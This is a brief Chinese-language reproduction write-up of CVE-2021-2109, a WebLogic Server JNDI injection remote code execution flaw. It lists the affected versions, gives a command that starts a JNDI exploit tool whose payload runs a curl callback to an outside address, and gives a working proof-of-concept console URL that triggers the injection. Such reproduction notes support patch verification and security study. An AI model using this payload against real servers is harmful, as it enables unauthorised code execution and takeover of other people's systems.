CVE-2021-2109 Weblogic远程代码执行漏洞复现

　　2021年1月20日，Oracle官方发布了漏洞补丁，修了包括 CVE-2021-2109 Weblogic Server远程代码执行漏洞在内的多个高危严重漏洞。CVE-2021-2109 中，攻击者可构造恶意请求，造成JNDI注入，执行任意代码，从而控制服务器。

　　影响版本：

　　WebLogic 10.3.6.0.0

　　WebLogic 12.1.3.0.0

　　WebLogic 12.2.1.3.0

　　WebLogic 12.2.1.4.0

　　WebLogic 14.1.1.0.0

复现环境：

　　Weblogic 12.1.3.0.0

复现步骤：

1.开启LDAP服务

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A 0.0.0.0 -C "curl [Address]:5555"

2.POC

/console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://[IP]:1389/XXX;AdminServer%22)

PS：ldap://x.x.x;(分号)x:1389/xxx

 3.效果

参考链接：

https://xz.aliyun.com/t/9049

https://mp.weixin.qq.com/s/wX9TMXl1KVWwB_k6EZOklw